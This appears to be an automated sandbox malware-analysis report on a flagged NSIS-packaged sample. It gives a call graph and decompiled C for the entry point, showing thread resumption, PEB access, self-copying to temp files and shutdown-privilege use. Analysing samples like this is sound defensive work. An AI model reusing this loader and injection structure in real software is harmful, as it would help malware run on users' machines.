13106->13108 13110 402322 13107->13110 13111 402c37 17 API calls 13107->13111 13109 402c37 17 API calls 13108->13109 13109->13107 13112 402330 13110->13112 13113 402c37 17 API calls 13110->13113 13111->13110 13114 402c37 17 API calls 13112->13114 13113->13112 13115 402339 WritePrivateProfileStringW 13114->13115 14316 2b660fd 14317 2b66082 14316->14317 14318 2b66134 14317->14318 14322 2b6ad57 14317->14322 14320 2b821bc 2 API calls 14318->14320 14319 2b81c0f EnumWindows 14319->14322 14324 2b661bd 14320->14324 14321 2b80eba EnumWindows 14326 2b625ca 14321->14326 14322->14319 14323 2b811dd EnumWindows 14322->14323 14325 2b8114c 14322->14325 14322->14326 14323->14322 14326->14321 14327 2b625ce 14326->14327 15047 2b653fd 15050 2b69dc3 GetPEB 15047->15050 15049 2b65402 15058 2b69ded 15050->15058 15051 2b81c0f EnumWindows 15056 2b6a0ef 15051->15056 15052 2b625ca 15054 2b625ce 15052->15054 15057 2b80eba EnumWindows 
15052->15057 15053 2b811dd EnumWindows 15053->15056 15054->15049 15055 2b8114c 15055->15049 15056->15049 15056->15051 15056->15052 15056->15053 15056->15055 15057->15052 15058->15055 15058->15056 15059 2b62511 15058->15059 15060 2b62338 EnumWindows 15059->15060 15061 2b62516 15060->15061 15061->15049 15062 40190c 15063 401943 15062->15063 15064 402c37 17 API calls 15063->15064 15065 401948 15064->15065 15066 405990 67 API calls 15065->15066 15067 401951 15066->15067 15091 2b671e9 15092 2b6716e 15091->15092 15093 2b84af7 NtResumeThread 15092->15093 15095 2b67186 15092->15095 15093->15095 15094 2b6757f 15095->15094 15096 2b84af7 NtResumeThread 15095->15096 15100 2b625ca 15095->15100 15101 2b6739c 15095->15101 15096->15101 15097 2b80eba EnumWindows 15097->15100 15098 2b81c0f EnumWindows 15099 2b6754c 15098->15099 15099->15098 15099->15100 15103 2b811dd EnumWindows 15099->15103 15104 2b6755a 15099->15104 15100->15097 15105 2b625ce 15100->15105 15101->15099 15102 2b84af7 NtResumeThread 15101->15102 15102->15099 15103->15099 13290 405425 13291 405446 GetDlgItem GetDlgItem GetDlgItem 13290->13291 13292 4055cf 13290->13292 13336 40424c SendMessageW 13291->13336 13294 405600 13292->13294 13295 4055d8 GetDlgItem CreateThread CloseHandle 13292->13295 13297 40562b 13294->13297 13300 405650 13294->13300 13301 405617 ShowWindow ShowWindow 13294->13301 13295->13294 13359 4053b9 OleInitialize 13295->13359 13296 4054b6 13305 4054bd GetClientRect GetSystemMetrics SendMessageW SendMessageW 13296->13305 13298 405637 13297->13298 13299 40568b 13297->13299 13302 405665 ShowWindow 13298->13302 13303 40563f 13298->13303 13299->13300 13312 405699 SendMessageW 13299->13312 13345 40427e 13300->13345 13341 40424c SendMessageW 13301->13341 13308 405685 13302->13308 13309 405677 13302->13309 13342 4041f0 13303->13342 13310 40552b 13305->13310 13311 40550f SendMessageW SendMessageW 13305->13311 13314 4041f0 SendMessageW 13308->13314 13313 4052e6 24 API calls 13309->13313 13315 405530 
SendMessageW 13310->13315 13316 40553e 13310->13316 13311->13310 13317 4056b2 CreatePopupMenu 13312->13317 13318 40565e 13312->13318 13313->13308 13314->13299 13315->13316 13337 404217 13316->13337 13319 4062a4 17 API calls 13317->13319 13321 4056c2 AppendMenuW 13319->13321 13323 4056f2 TrackPopupMenu 13321->13323 13324 4056df GetWindowRect 13321->13324 13322 40554e 13325 405557 ShowWindow 13322->13325 13326 40558b GetDlgItem SendMessageW 13322->13326 13323->13318 13327 40570d 13323->13327 13324->13323 13328 40557a 13325->13328 13329 40556d ShowWindow 13325->13329 13326->13318 13330 4055b2 SendMessageW SendMessageW 13326->13330 13331 405729 SendMessageW 13327->13331 13340 40424c SendMessageW 13328->13340 13329->13328 13330->13318 13331->13331 13332 405746 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 13331->13332 13334 40576b SendMessageW 13332->13334 13334->13334 13335 405794 GlobalUnlock SetClipboardData CloseClipboard 13334->13335 13335->13318 13336->13296 13338 4062a4 17 API calls 13337->13338 13339 404222 SetDlgItemTextW 13338->13339 13339->13322 13340->13326 13341->13297 13343 4041f7 13342->13343 13344 4041fd SendMessageW 13342->13344 13343->13344 13344->13300 13346 404296 GetWindowLongW 13345->13346 13356 40431f 13345->13356 13347 4042a7 13346->13347 13346->13356 13348 4042b6 GetSysColor 13347->13348 13349 4042b9 13347->13349 13348->13349 13350 4042c9 SetBkMode 13349->13350 13351 4042bf SetTextColor 13349->13351 13352 4042e1 GetSysColor 13350->13352 13353 4042e7 13350->13353 13351->13350 13352->13353 13354 4042f8 13353->13354 13355 4042ee SetBkColor 13353->13355 13354->13356 13357 404312 CreateBrushIndirect 13354->13357 13358 40430b DeleteObject 13354->13358 13355->13354 13356->13318 13357->13356 13358->13357 13366 404263 13359->13366 13361 405403 13362 404263 SendMessageW 13361->13362 13364 405415 OleUninitialize 13362->13364 13363 4053dc 13363->13361 13369 401389 13363->13369 13367 40427b 13366->13367 13368 40426c SendMessageW 13366->13368 
13367->13363 13368->13367 13371 401390 13369->13371 13370 4013fe 13370->13363 13371->13370 13372 4013cb MulDiv SendMessageW 13371->13372 13372->13371 13382 40202c 13383 4020f0 13382->13383 13384 40203e 13382->13384 13386 401423 24 API calls 13383->13386 13385 402c37 17 API calls 13384->13385 13387 402045 13385->13387 13392 40224a 13386->13392 13388 402c37 17 API calls 13387->13388 13389 40204e 13388->13389 13390 402064 LoadLibraryExW 13389->13390 13391 402056 GetModuleHandleW 13389->13391 13390->13383 13393 402075 13390->13393 13391->13390 13391->13393 13405 4066cb WideCharToMultiByte 13393->13405 13396 402086 13398 4020a5 13396->13398 13399 40208e 13396->13399 13397 4020bf 13400 4052e6 24 API calls 13397->13400 13408 10001759 13398->13408 13401 401423 24 API calls 13399->13401 13402 402096 13400->13402 13401->13402 13402->13392 13403 4020e2 FreeLibrary 13402->13403 13403->13392 13406 4066f5 GetProcAddress 13405->13406 13407 402080 13405->13407 13406->13407 13407->13396 13407->13397 13409 10001789 13408->13409 13450 10001b18 13409->13450 13411 10001790 13412 100018a6 13411->13412 13413 100017a1 13411->13413 13414 100017a8 13411->13414 13412->13402 13498 10002286 13413->13498 13482 100022d0 13414->13482 13419 100017cd 13420 1000180c 13419->13420 13421 100017ee 13419->13421 13426 10001812 13420->13426 13427 1000184e 13420->13427 13511 100024a4 13421->13511 13422 100017d7 13422->13419 13508 10002b57 13422->13508 13423 100017be 13425 100017c4 13423->13425 13431 100017cf 13423->13431 13425->13419 13492 1000289c 13425->13492 13433 100015b4 3 API calls 13426->13433 13429 100024a4 10 API calls 13427->13429 13437 10001840 13429->13437 13430 100017f4 13522 100015b4 13430->13522 13502 10002640 13431->13502 13436 10001828 13433->13436 13440 100024a4 10 API calls 13436->13440 13441 10001895 13437->13441 13533 10002467 13437->13533 13439 100017d5 13439->13419 13440->13437 13441->13412 13443 1000189f GlobalFree 13441->13443 13443->13412 13447 10001881 13447->13441 13537 1000153d 
wsprintfW 13447->13537 13448 1000187a FreeLibrary 13448->13447 13540 1000121b GlobalAlloc 13450->13540 13452 10001b3c 13541 1000121b GlobalAlloc 13452->13541 13454 10001d7a GlobalFree GlobalFree GlobalFree 13455 10001d97 13454->13455 13473 10001de1 13454->13473 13456 100020ee 13455->13456 13464 10001dac 13455->13464 13455->13473 13458 10002110 GetModuleHandleW 13456->13458 13456->13473 13457 10001c1d GlobalAlloc 13475 10001b47 13457->13475 13461 10002121 LoadLibraryW 13458->13461 13462 10002136 13458->13462 13459 10001c68 lstrcpyW 13465 10001c72 lstrcpyW 13459->13465 13460 10001c86 GlobalFree 13460->13475 13461->13462 13461->13473 13548 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 13462->13548 13464->13473 13544 1000122c 13464->13544 13465->13475 13466 10002188 13467 10002195 lstrlenW 13466->13467 13466->13473 13549 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 13467->13549 13469 10002148 13469->13466 13481 10002172 GetProcAddress 13469->13481 13471 10002048 13471->13473 13476 10002090 lstrcpyW 13471->13476 13473->13411 13474 100021af 13474->13473 13475->13454 13475->13457 13475->13459 13475->13460 13475->13465 13475->13471 13475->13473 13477 10001cc4 13475->13477 13478 10001f37 GlobalFree 13475->13478 13480 1000122c 2 API calls 13475->13480 13547 1000121b GlobalAlloc 13475->13547 13476->13473 13477->13475 13542 1000158f GlobalSize GlobalAlloc 13477->13542 13478->13475 13480->13475 13481->13466 13489 100022e8 13482->13489 13483 1000122c GlobalAlloc lstrcpynW 13483->13489 13485 10002410 GlobalFree 13486 100017ae 13485->13486 13485->13489 13486->13419 13486->13422 13486->13423 13487 100023ba GlobalAlloc CLSIDFromString 13487->13485 13488 1000238f GlobalAlloc WideCharToMultiByte 13488->13485 13489->13483 13489->13485 13489->13487 13489->13488 13491 100023d9 13489->13491 13551 100012ba 13489->13551 13491->13485 13555 100025d4 13491->13555 13494 100028ae 13492->13494 13493 10002953 
EnumWindows 13495 10002971 13493->13495 13494->13493 13496 10002a62 GetLastError 13495->13496 13497 10002a6d 13495->13497 13496->13497 13497->13419 13499 10002296 13498->13499 13500 100017a7 13498->13500 13499->13500 13501 100022a8 GlobalAlloc 13499->13501 13500->13414 13501->13499 13506 1000265c 13502->13506 13503 100026c0 13505 100026c5 GlobalSize 13503->13505 13507 100026cf 13503->13507 13504 100026ad GlobalAlloc 13504->13507 13505->13507 13506->13503 13506->13504 13507->13439 13509 10002b62 13508->13509 13510 10002ba2 GlobalFree 13509->13510 13558 1000121b GlobalAlloc 13511->13558 13513 10002506 MultiByteToWideChar 13519 100024ae 13513->13519 13514 1000252b StringFromGUID2 13514->13519 13515 1000253c lstrcpynW 13515->13519 13516 1000254f wsprintfW 13516->13519 13517 1000256c GlobalFree 13517->13519 13518 100025a7 GlobalFree 13518->13430 13519->13513 13519->13514 13519->13515 13519->13516 13519->13517 13519->13518 13520 10001272 2 API calls 13519->13520 13559 100012e1 13519->13559 13520->13519 13563 1000121b GlobalAlloc 13522->13563 13524 100015ba 13525 100015c7 lstrcpyW 13524->13525 13527 100015e1 13524->13527 13528 100015fb 13525->13528 13527->13528 13529 100015e6 wsprintfW 13527->13529 13530 10001272 13528->13530 13529->13528 13531 100012b5 GlobalFree 13530->13531 13532 1000127b GlobalAlloc lstrcpynW 13530->13532 13531->13437 13532->13531 13534 10001861 13533->13534 13535 10002475 13533->13535 13534->13447 13534->13448 13535->13534 13536 10002491 GlobalFree 13535->13536 13536->13535 13538 10001272 2 API calls 13537->13538 13539 1000155e 13538->13539 13539->13441 13540->13452 13541->13475 13543 100015ad 13542->13543 13543->13477 13550 1000121b GlobalAlloc 13544->13550 13546 1000123b lstrcpynW 13546->13473 13547->13475 13548->13469 13549->13474 13550->13546 13552 100012c1 13551->13552 13553 1000122c 2 API calls 13552->13553 13554 100012df 13553->13554 13554->13489 13556 100025e2 VirtualAlloc 13555->13556 13557 10002638 13555->13557 13556->13557 13557->13491 
13558->13519 13560 100012ea 13559->13560 13561 1000130c 13559->13561 13560->13561 13562 100012f0 lstrcpyW 13560->13562 13561->13519 13562->13561 13563->13524 14435 402a2f 14436 402c15 17 API calls 14435->14436 14437 402a35 14436->14437 14438 402a6c 14437->14438 14439 402a47 14437->14439 14441 402885 14437->14441 14440 4062a4 17 API calls 14438->14440 14438->14441 14439->14441 14443 4061c9 wsprintfW 14439->14443 14440->14441 14443->14441 15159 2b66fc4 15160 2b670c4 15159->15160 15161 2b84af7 NtResumeThread 15160->15161 15163 2b67187 15161->15163 15162 2b6757f 15163->15162 15164 2b84af7 NtResumeThread 15163->15164 15168 2b625ca 15163->15168 15169 2b6739c 15163->15169 15164->15169 15165 2b6755a 15166 2b80eba EnumWindows 15166->15168 15167 2b81c0f EnumWindows 15172 2b6754c 15167->15172 15168->15166 15173 2b625ce 15168->15173 15171 2b84af7 NtResumeThread 15169->15171 15169->15172 15170 2b811dd EnumWindows 15170->15172 15171->15172 15172->15165 15172->15167 15172->15168 15172->15170 15174 401735 15175 402c37 17 API calls 15174->15175 15176 40173c SearchPathW 15175->15176 15177 4029e0 15176->15177 15178 401757 15176->15178 15178->15177 15180 406282 lstrcpynW 15178->15180 15180->15177 13927 403d3e 13928 403e91 13927->13928 13929 403d56 13927->13929 13931 403ea2 GetDlgItem GetDlgItem 13928->13931 13932 403ee2 13928->13932 13929->13928 13930 403d62 13929->13930 13933 403d80 13930->13933 13934 403d6d SetWindowPos 13930->13934 13935 404217 18 API calls 13931->13935 13936 403f3c 13932->13936 13945 401389 2 API calls 13932->13945 13938 403d85 ShowWindow 13933->13938 13939 403d9d 13933->13939 13934->13933 13940 403ecc SetClassLongW 13935->13940 13937 404263 SendMessageW 13936->13937 13941 403e8c 13936->13941 13968 403f4e 13937->13968 13938->13939 13942 403da5 DestroyWindow 13939->13942 13943 403dbf 13939->13943 13944 40140b 2 API calls 13940->13944 13947 4041a0 13942->13947 13948 403dc4 SetWindowLongW 13943->13948 13949 403dd5 13943->13949 13944->13932 13946 403f14 13945->13946 
13946->13936 13950 403f18 SendMessageW 13946->13950 13947->13941 13956 4041d1 ShowWindow 13947->13956 13948->13941 13953 403de1 GetDlgItem 13949->13953 13954 403e7e 13949->13954 13950->13941 13951 40140b 2 API calls 13951->13968 13952 4041a2 DestroyWindow EndDialog 13952->13947 13957 403e11 13953->13957 13958 403df4 SendMessageW IsWindowEnabled 13953->13958 13955 40427e 8 API calls 13954->13955 13955->13941 13956->13941 13960 403e1e 13957->13960 13961 403e65 SendMessageW 13957->13961 13962 403e31 13957->13962 13972 403e16 13957->13972 13958->13941 13958->13957 13959 4062a4 17 API calls 13959->13968 13960->13961 13960->13972 13961->13954 13965 403e39 13962->13965 13966 403e4e 13962->13966 13963 4041f0 SendMessageW 13967 403e4c 13963->13967 13964 404217 18 API calls 13964->13968 13969 40140b 2 API calls 13965->13969 13970 40140b 2 API calls 13966->13970 13967->13954 13968->13941 13968->13951 13968->13952 13968->13959 13968->13964 13973 404217 18 API calls 13968->13973 13989 4040e2 DestroyWindow 13968->13989 13969->13972 13971 403e55 13970->13971 13971->13954 13971->13972 13972->13963 13974 403fc9 GetDlgItem 13973->13974 13975 403fe6 ShowWindow KiUserCallbackDispatcher 13974->13975 13976 403fde 13974->13976 13998 404239 KiUserCallbackDispatcher 13975->13998 13976->13975 13978 404010 EnableWindow 13983 404024 13978->13983 13979 404029 GetSystemMenu EnableMenuItem SendMessageW 13980 404059 SendMessageW 13979->13980 13979->13983 13980->13983 13982 403d1f 18 API calls 13982->13983 13983->13979 13983->13982 13999 40424c SendMessageW 13983->13999 14000 406282 lstrcpynW 13983->14000 13985 404088 lstrlenW 13986 4062a4 17 API calls 13985->13986 13987 40409e SetWindowTextW 13986->13987 13988 401389 2 API calls 13987->13988 13988->13968 13989->13947 13990 4040fc CreateDialogParamW 13989->13990 13990->13947 13991 40412f 13990->13991 13992 404217 18 API calls 13991->13992 13993 40413a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 13992->13993 13994 401389 2 API calls 
13993->13994 13995 404180 13994->13995 13995->13941 13996 404188 ShowWindow 13995->13996 13997 404263 SendMessageW 13996->13997 13997->13947 13998->13978 13999->13983 14000->13985 14495 2b65ec9 14496 2b65e4e 14495->14496 14497 2b821bc 2 API calls 14496->14497 14498 2b65efe 14497->14498 14499 2b62511 14498->14499 14500 2b65f81 14498->14500 14501 2b62338 EnumWindows 14499->14501 14503 2b66134 14500->14503 14507 2b6ad57 14500->14507 14502 2b62516 14501->14502 14505 2b821bc 2 API calls 14503->14505 14504 2b81c0f EnumWindows 14504->14507 14509 2b661bd 14505->14509 14506 2b80eba EnumWindows 14511 2b625ca 14506->14511 14507->14504 14508 2b811dd EnumWindows 14507->14508 14510 2b8114c 14507->14510 14507->14511 14508->14507 14511->14506 14512 2b625ce 14511->14512 12976 4015c1 12977 402c37 17 API calls 12976->12977 12978 4015c8 12977->12978 12979 405bfe 4 API calls 12978->12979 12992 4015d1 12979->12992 12980 401631 12982 401663 12980->12982 12983 401636 12980->12983 12981 405b80 CharNextW 12981->12992 12985 401423 24 API calls 12982->12985 13003 401423 12983->13003 12991 40165b 12985->12991 12990 40164a SetCurrentDirectoryW 12990->12991 12992->12980 12992->12981 12993 401617 GetFileAttributesW 12992->12993 12995 40584f 12992->12995 12998 4057b5 CreateDirectoryW 12992->12998 13007 405832 CreateDirectoryW 12992->13007 12993->12992 13010 40665c GetModuleHandleA 12995->13010 12999 405802 12998->12999 13000 405806 GetLastError 12998->13000 12999->12992 13000->12999 13001 405815 SetFileSecurityW 13000->13001 13001->12999 13002 40582b GetLastError 13001->13002 13002->12999 13004 4052e6 24 API calls 13003->13004 13005 401431 13004->13005 13006 406282 lstrcpynW 13005->13006 13006->12990 13008 405842 13007->13008 13009 405846 GetLastError 13007->13009 13008->12992 13009->13008 13011 406682 GetProcAddress 13010->13011 13012 406678 13010->13012 13013 405856 13011->13013 13016 4065ec GetSystemDirectoryW 13012->13016 13013->12992 13015 40667e 13015->13011 13015->13013 13017 40660e 
wsprintfW LoadLibraryExW 13016->13017 13017->13015 14516 4016cc 14517 402c37 17 API calls 14516->14517 14518 4016d2 GetFullPathNameW 14517->14518 14519 40170e 14518->14519 14520 4016ec 14518->14520 14521 401723 GetShortPathNameW 14519->14521 14522 402abf 14519->14522 14520->14519 14523 4065c5 2 API calls 14520->14523 14521->14522 14524 4016fe 14523->14524 14524->14519 14526 406282 lstrcpynW 14524->14526 14526->14519 13150 2b61f3b 13153 2b7fd8b 13150->13153 13152 2b61f40 13152->13152 13154 2b80eba EnumWindows 13153->13154 13155 2b7fd9d 13154->13155 13175 2b821bc 13155->13175 13157 2b7fe17 13194 2b8002e 13157->13194 13159 2b80009 13159->13152 13160 2b62511 13160->13159 13161 2b62338 EnumWindows 13160->13161 13163 2b62516 13161->13163 13162 2b7fe82 13162->13159 13162->13160 13164 2b7ff4e 13162->13164 13169 2b6ad57 13162->13169 13163->13152 13165 2b821bc 2 API calls 13164->13165 13166 2b7ff54 13165->13166 13167 2b8002e CreateFileA 13166->13167 13167->13160 13168 2b81c0f EnumWindows 13168->13169 13169->13168 13171 2b811dd EnumWindows 13169->13171 13172 2b8114c 13169->13172 13173 2b625ca 13169->13173 13170 2b80eba EnumWindows 13170->13173 13171->13169 13172->13152 13173->13170 13174 2b625ce 13173->13174 13174->13152 13176 2b821c8 13175->13176 13177 2b6ad57 13175->13177 13179 2b82276 13176->13179 13184 2b62511 13176->13184 13185 2b823d4 13176->13185 13178 2b81c0f EnumWindows 13177->13178 13180 2b811dd EnumWindows 13177->13180 13182 2b625ca 13177->13182 13183 2b8114c 13177->13183 13178->13177 13179->13157 13180->13177 13181 2b80eba EnumWindows 13181->13182 13182->13181 13192 2b625ce 13182->13192 13183->13157 13186 2b62338 EnumWindows 13184->13186 13187 2b80eba EnumWindows 13185->13187 13188 2b62516 13186->13188 13190 2b823ef 13187->13190 13188->13157 13193 2b8298e 13190->13193 13196 2b84af7 13190->13196 13198 2b81390 13190->13198 13192->13157 13195 2b80112 CreateFileA 13194->13195 13195->13162 13203 2b84afc 13196->13203 13199 2b62511 13198->13199 13200 2b62338 EnumWindows 

                                                                          C-Code - Quality: 81%
                                                                          			_entry_() {
                                                                          				signed int _t51;
                                                                          				intOrPtr* _t56;
                                                                          				WCHAR* _t60;
                                                                          				char* _t63;
                                                                          				void* _t66;
                                                                          				void* _t68;
                                                                          				int _t70;
                                                                          				int _t72;
                                                                          				int _t75;
                                                                          				intOrPtr* _t76;
                                                                          				int _t77;
                                                                          				int _t79;
                                                                          				void* _t103;
                                                                          				signed int _t120;
                                                                          				void* _t123;
                                                                          				void* _t128;
                                                                          				intOrPtr _t147;
                                                                          				intOrPtr _t148;
                                                                          				intOrPtr* _t149;
                                                                          				int _t151;
                                                                          				void* _t154;
                                                                          				int _t155;
                                                                          				signed int _t159;
                                                                          				signed int _t164;
                                                                          				signed int _t169;
                                                                          				void* _t171;
                                                                          				WCHAR* _t172;
                                                                          				signed int _t175;
                                                                          				signed int _t178;
                                                                          				CHAR* _t179;
                                                                          				void* _t182;
                                                                          				int* _t184;
                                                                          				void* _t192;
                                                                          				char* _t193;
                                                                          				void* _t196;
                                                                          				void* _t197;
                                                                          				void* _t243;
                                                                          
                                                                          				_t171 = 0x20;
                                                                          				_t151 = 0;
                                                                          				 *(_t197 + 0x14) = 0;
                                                                          				 *(_t197 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                          				 *(_t197 + 0x1c) = 0;
                                                                          				SetErrorMode(0x8001); // executed
                                                                          				_t51 = GetVersion() & 0xbfffffff;
                                                                          				 *0x434eec = _t51;
                                                                          				if(_t51 != 6) {
                                                                          					_t149 = E0040665C(0);
                                                                          					if(_t149 != 0) {
                                                                          						 *_t149(0xc00);
                                                                          					}
                                                                          				}
                                                                          				_t179 = "UXTHEME";
                                                                          				goto L4;
                                                                          				L8:
                                                                          				__imp__#17(_t192);
                                                                          				__imp__OleInitialize(_t151); // executed
                                                                          				 *0x434fb8 = _t56;
                                                                          				SHGetFileInfoW(0x42b208, _t151, _t197 + 0x34, 0x2b4, _t151); // executed
                                                                          				E00406282(0x433ee0, L"NSIS Error");
                                                                          				_t60 = GetCommandLineW();
                                                                          				_t193 = L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe\"";
                                                                          				E00406282(_t193, _t60);
                                                                          				 *0x434ee0 = GetModuleHandleW(_t151);
                                                                          				_t63 = _t193;
                                                                          				if(L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe\"" == 0x22) {
                                                                          					_t63 =  &M0043F002;
                                                                          					_t171 = 0x22;
                                                                          				}
                                                                          				_t155 = CharNextW(E00405B80(_t63, _t171));
                                                                          				 *(_t197 + 0x18) = _t155;
                                                                          				_t66 =  *_t155;
                                                                          				if(_t66 == _t151) {
                                                                          					L33:
                                                                          					_t172 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                                                          					GetTempPathW(0x400, _t172);
                                                                          					_t68 = E00403342(_t155, 0);
                                                                          					_t225 = _t68;
                                                                          					if(_t68 != 0) {
                                                                          						L36:
                                                                          						DeleteFileW(L"1033"); // executed
                                                                          						_t70 = E00402EC1(_t227,  *(_t197 + 0x1c)); // executed
                                                                          						 *(_t197 + 0x10) = _t70;
                                                                          						if(_t70 != _t151) {
                                                                          							L48:
                                                                          							E004038B6();
                                                                          							__imp__OleUninitialize();
                                                                          							_t239 =  *(_t197 + 0x10) - _t151;
                                                                          							if( *(_t197 + 0x10) == _t151) {
                                                                          								__eflags =  *0x434f94 - _t151;
                                                                          								if( *0x434f94 == _t151) {
                                                                          									L72:
                                                                          									_t72 =  *0x434fac;
                                                                          									__eflags = _t72 - 0xffffffff;
                                                                          									if(_t72 != 0xffffffff) {
                                                                          										 *(_t197 + 0x10) = _t72;
                                                                          									}
                                                                          									ExitProcess( *(_t197 + 0x10));
                                                                          								}
                                                                          								_t75 = OpenProcessToken(GetCurrentProcess(), 0x28, _t197 + 0x14);
                                                                          								__eflags = _t75;
                                                                          								if(_t75 != 0) {
                                                                          									LookupPrivilegeValueW(_t151, L"SeShutdownPrivilege", _t197 + 0x20);
                                                                          									 *(_t197 + 0x34) = 1;
                                                                          									 *(_t197 + 0x40) = 2;
                                                                          									AdjustTokenPrivileges( *(_t197 + 0x28), _t151, _t197 + 0x24, _t151, _t151, _t151);
                                                                          								}
                                                                          								_t76 = E0040665C(4);
                                                                          								__eflags = _t76 - _t151;
                                                                          								if(_t76 == _t151) {
                                                                          									L70:
                                                                          									_t77 = ExitWindowsEx(2, 0x80040002);
                                                                          									__eflags = _t77;
                                                                          									if(_t77 != 0) {
                                                                          										goto L72;
                                                                          									}
                                                                          									goto L71;
                                                                          								} else {
                                                                          									_t79 =  *_t76(_t151, _t151, _t151, 0x25, 0x80040002);
                                                                          									__eflags = _t79;
                                                                          									if(_t79 == 0) {
                                                                          										L71:
                                                                          										E0040140B(9);
                                                                          										goto L72;
                                                                          									}
                                                                          									goto L70;
                                                                          								}
                                                                          							}
                                                                          							E004058E4( *(_t197 + 0x10), 0x200010);
                                                                          							ExitProcess(2);
                                                                          						}
                                                                          						if( *0x434f00 == _t151) {
                                                                          							L47:
                                                                          							 *0x434fac =  *0x434fac | 0xffffffff;
                                                                          							 *(_t197 + 0x14) = E00403990( *0x434fac);
                                                                          							goto L48;
                                                                          						}
                                                                          						_t184 = E00405B80(_t193, _t151);
                                                                          						if(_t184 < _t193) {
                                                                          							L44:
                                                                          							_t236 = _t184 - _t193;
                                                                          							 *(_t197 + 0x10) = L"Error launching installer";
                                                                          							if(_t184 < _t193) {
                                                                          								_t182 = E0040584F(_t239);
                                                                          								lstrcatW(_t172, L"~nsu");
                                                                          								if(_t182 != _t151) {
                                                                          									lstrcatW(_t172, "A");
                                                                          								}
                                                                          								lstrcatW(_t172, L".tmp");
                                                                          								_t195 = L"C:\\Users\\Arthur\\Desktop";
                                                                          								if(lstrcmpiW(_t172, L"C:\\Users\\Arthur\\Desktop") != 0) {
                                                                          									_push(_t172);
                                                                          									if(_t182 == _t151) {
                                                                          										E00405832();
                                                                          									} else {
                                                                          										E004057B5();
                                                                          									}
                                                                          									SetCurrentDirectoryW(_t172);
                                                                          									_t243 = L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ligtorn\\Pantry" - _t151; // 0x43
                                                                          									if(_t243 == 0) {
                                                                          										E00406282(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ligtorn\\Pantry", _t195);
                                                                          									}
                                                                          									E00406282(0x435000,  *(_t197 + 0x18));
                                                                          									_t156 = "A" & 0x0000ffff;
                                                                          									 *0x435800 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                                          									_t196 = 0x1a;
                                                                          									do {
                                                                          										E004062A4(_t151, _t172, 0x42aa08, 0x42aa08,  *((intOrPtr*)( *0x434ef4 + 0x120)));
                                                                          										DeleteFileW(0x42aa08);
                                                                          										if( *(_t197 + 0x10) != _t151 && CopyFileW(L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe", 0x42aa08, 1) != 0) {
                                                                          											E00406048(_t156, 0x42aa08, _t151);
                                                                          											E004062A4(_t151, _t172, 0x42aa08, 0x42aa08,  *((intOrPtr*)( *0x434ef4 + 0x124)));
                                                                          											_t103 = E00405867(0x42aa08);
                                                                          											if(_t103 != _t151) {
                                                                          												CloseHandle(_t103);
                                                                          												 *(_t197 + 0x10) = _t151;
                                                                          											}
                                                                          										}
                                                                          										 *0x435800 =  *0x435800 + 1;
                                                                          										_t196 = _t196 - 1;
                                                                          									} while (_t196 != 0);
                                                                          									E00406048(_t156, _t172, _t151);
                                                                          								}
                                                                          								goto L48;
                                                                          							}
                                                                          							 *_t184 = _t151;
                                                                          							_t185 =  &(_t184[2]);
                                                                          							if(E00405C5B(_t236,  &(_t184[2])) == 0) {
                                                                          								goto L48;
                                                                          							}
                                                                          							E00406282(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ligtorn\\Pantry", _t185);
                                                                          							E00406282(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ligtorn\\Pantry\\Agrafferne", _t185);
                                                                          							 *(_t197 + 0x10) = _t151;
                                                                          							goto L47;
                                                                          						}
                                                                          						asm("cdq");
                                                                          						asm("cdq");
                                                                          						asm("cdq");
                                                                          						_t159 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                                          						_t120 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t164 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                                                                          						while( *_t184 != _t159 || _t184[1] != _t120) {
                                                                          							_t184 = _t184;
                                                                          							if(_t184 >= _t193) {
                                                                          								continue;
                                                                          							}
                                                                          							break;
                                                                          						}
                                                                          						_t151 = 0;
                                                                          						goto L44;
                                                                          					}
                                                                          					GetWindowsDirectoryW(_t172, 0x3fb);
                                                                          					lstrcatW(_t172, L"\\Temp");
                                                                          					_t123 = E00403342(_t155, _t225);
                                                                          					_t226 = _t123;
                                                                          					if(_t123 != 0) {
                                                                          						goto L36;
                                                                          					}
                                                                          					GetTempPathW(0x3fc, _t172);
                                                                          					lstrcatW(_t172, L"Low");
                                                                          					SetEnvironmentVariableW(L"TEMP", _t172);
                                                                          					SetEnvironmentVariableW(L"TMP", _t172);
                                                                          					_t128 = E00403342(_t155, _t226);
                                                                          					_t227 = _t128;
                                                                          					if(_t128 == 0) {
                                                                          						goto L48;
                                                                          					}
                                                                          					goto L36;
                                                                          				} else {
                                                                          					do {
                                                                          						_t154 = 0x20;
                                                                          						if(_t66 != _t154) {
                                                                          							L13:
                                                                          							if( *_t155 == 0x22) {
                                                                          								_t155 = _t155 + 2;
                                                                          								_t154 = 0x22;
                                                                          							}
                                                                          							if( *_t155 != 0x2f) {
                                                                          								goto L27;
                                                                          							} else {
                                                                          								_t155 = _t155 + 2;
                                                                          								if( *_t155 == 0x53) {
                                                                          									_t148 =  *((intOrPtr*)(_t155 + 2));
                                                                          									if(_t148 == 0x20 || _t148 == 0) {
                                                                          										 *0x434fa0 = 1;
                                                                          									}
                                                                          								}
                                                                          								asm("cdq");
                                                                          								asm("cdq");
                                                                          								_t169 = L"NCRC" & 0x0000ffff;
                                                                          								asm("cdq");
